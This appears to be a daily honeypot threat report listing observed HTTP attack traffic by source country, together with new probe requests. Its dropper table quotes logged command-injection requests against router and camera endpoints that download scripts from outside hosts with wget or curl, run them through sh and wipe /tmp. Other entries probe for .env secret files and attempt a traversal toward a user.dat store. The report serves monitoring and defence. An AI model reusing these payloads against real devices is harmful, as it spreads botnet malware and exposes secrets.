
Report: 2025-07-15

Author: Shoggoth Industries

Daily Report: 2025-07-15

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 11 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 53 new requests that have never been observed before (these were added to the monitored request database).

A total of 1276 requests were recorded during the day, originating from 11 different countries, with a peak of 485 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Germany |
| US | Germany |
| US | Germany |
| US | Germany |
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 45.135.194.11 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.tbk.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.tbk.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.tbk.sh%29%20%7C%20sh%3B%29%3Becho%20 HTTP/1.1 |
| 45.135.194.11 | GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3B%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%29%20%7C%20sh%3B%27 HTTP/1.1 |
| 183.252.52.229 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.222.237.234 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 45.135.194.11 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.netgear.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.netgear.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.netgear.sh%29%20%7C%20sh&curpath=%2F&currentsetting.htm=1 HTTP/1.1 |
| 45.135.194.11 | GET /login.cgi?multilingual%20show%27%3B%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.dlink.sh%29%20%7C%20sh%3B%27%24 HTTP/1.1 |
| 113.200.121.71 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 45.230.66.123 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.123:11401/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 47.236.247.145 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 8.219.208.212 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
| 120.77.56.42 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

|  | number_of_occurence | request |
| --- | --- | --- |
| 50 | 3 | GET /dispatch.asp HTTP/1.1 |
| 71 | 2 | GET /depot/1238681/chunk/4dd971c1e85e3f6381f75400c449954f9adc44bb HTTP/1.1 |
| 72 | 2 | h\x01\x00fM2\x05\x00\xFF\x01\x06\x00\xFF\x09\x05\x07\x00\xFF\x09\x07\x01\x00\x00!5/////./..//////./..//////./../flash/rw/store/user.dat\x02\x00\xFF\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xFF\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00 |
| 94 | 2 | GET /.env-compose HTTP/1.1 |
| 95 | 2 | GET /.env-journal HTTP/1.1 |
| 100 | 2 | GET /.env.ini.bak HTTP/1.1 |
| 101 | 2 | GET /.env-backend HTTP/1.1 |
| 103 | 2 | GET /.env-ssl-key HTTP/1.1 |
| 106 | 2 | GET /.env-app.yml HTTP/1.1 |
| 107 | 2 | GET /.env-key.pem HTTP/1.1 |
| 108 | 2 | GET /.env.dev.bak HTTP/1.1 |
| 109 | 2 | GET /.env-cypress HTTP/1.1 |
| 110 | 2 | GET /.env.mongodb HTTP/1.1 |
| 291 | 1 | GET /Odin/http/call1752598351 HTTP/1.1 |
| 292 | 1 | GET /OdinHttpCall1752598351 HTTP/1.1 |
| 293 | 1 | GET /odinhttpcall1752598351 HTTP/1.1 |
| 294 | 1 | \x00\x0E8\xC6\xE2\xC8w&\xB6\xB2\xCD\x00\x00\x00\x00\x00 |
| 367 | 1 | GET /.env-crack HTTP/1.1 |
| 368 | 1 | GET /.env-junit HTTP/1.1 |
| 369 | 1 | GET /.env-proxy HTTP/1.1 |
| 370 | 1 | GET /.env-guide HTTP/1.1 |
| 371 | 1 | GET /.env_hooks HTTP/1.1 |
| 372 | 1 | GET /.env_oauth HTTP/1.1 |
| 374 | 1 | GET /.env-auth0 HTTP/1.1 |
| 375 | 1 | GET /app/.env.1 HTTP/1.1 |
| 376 | 1 | GET /app/.env.2 HTTP/1.1 |
| 377 | 1 | GET /auth/.env~ HTTP/1.1 |
| 389 | 1 | \x00\x0E8\xC3\xDB\x9B\x8Ft\xD7\xEF#\x00\x00\x00\x00\x00 |
| 395 | 1 | GET /.env-latency HTTP/1.1 |
| 398 | 1 | GET /.env-karma HTTP/1.1 |
| 399 | 1 | \x00\x0E\x08\xDDr\xBA\xC5\xDF\x12\xCFj\x00\x00\x00\x00\x00 |
| 417 | 1 | GET /Odin/http/call1752588900 HTTP/1.1 |
| 418 | 1 | GET /OdinHttpCall1752588900 HTTP/1.1 |
| 419 | 1 | GET /odinhttpcall1752588900 HTTP/1.1 |
| 423 | 1 | GET /Odin/http/call1752588106 HTTP/1.1 |
| 424 | 1 | GET /OdinHttpCall1752588106 HTTP/1.1 |
| 425 | 1 | GET /odinhttpcall1752588106 HTTP/1.1 |
| 430 | 1 | \x00\x0E8\xDDr\xBA\xC5\xDF\x12\xCFj\x00\x00\x00\x00\x00 |
| 431 | 1 | GET /.env.admin HTTP/1.1 |
| 432 | 1 | GET /\x5C\x22/.env\x5C\x22, HTTP/1.1 |
| 433 | 1 | GET /Theme/.env HTTP/1.1 |
| 434 | 1 | GET /ci/cd/.env HTTP/1.1 |
| 439 | 1 | GET /.env_vault HTTP/1.1 |
| 440 | 1 | GET /api/.env.~ HTTP/1.1 |
| 441 | 1 | GET /.env_token HTTP/1.1 |
| 442 | 1 | GET /.env_tasks HTTP/1.1 |
| 443 | 1 | GET /api/.env.2 HTTP/1.1 |
| 444 | 1 | GET /api/.env.1 HTTP/1.1 |
| 458 | 1 | \x00\x0E8\xBC\xE9 |
| 461 | 1 | GET /0/env.json HTTP/1.1 |
| 462 | 1 | GET /.env.token HTTP/1.1 |
| 467 | 1 | \x00\x0E8\xBE\x9D0\xC8\x87\xABS-\x00\x00\x00\x00\x00 |
| 493 | 1 | GET /infra/.env HTTP/1.1 |

country_iso_code

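|  | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 485 | US |
| 1 | 207 | GB |
| 2 | 111 | DE |
| 3 | 69 | PL |
| 4 | 66 | NL |
| 5 | 41 | CA |
| 6 | 35 | HK |
| 7 | 33 | BG |
| 8 | 28 | RU |
| 9 | 27 | SC |
| 10 | 26 | IN |
| 11 | 25 | CN |
| 12 | 17 | SG |
| 13 | 15 | AU |
| 14 | 9 | CH |
| 15 | 8 | AO |
| 16 | 7 | MU |
| 17 | 6 | MN |
| 18 | 6 | BR |
| 19 | 6 | VN |
| 20 | 6 | MD |
| 21 | 4 | BE |
| 22 | 3 | KR |
| 23 | 3 | KZ |
| 24 | 3 | FR |
| 25 | 3 | PT |
| 26 | 3 | NG |
| 27 | 2 | ES |
| 28 | 2 | SE |
| 29 | 2 | IE |
| 30 | 2 | IR |
| 31 | 2 | AR |
| 32 | 2 | IL |
| 33 | 2 | KH |
| 34 | 1 | MC |
| 35 | 1 | SK |
| 36 | 1 | CZ |
| 37 | 1 | BD |
| 38 | 1 | ID |
| 39 | 1 | LV |
| 40 | 1 | RS |
| 41 | 1 | SI |
| 42 | 1 | MX |
| 43 | 1 | EE |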
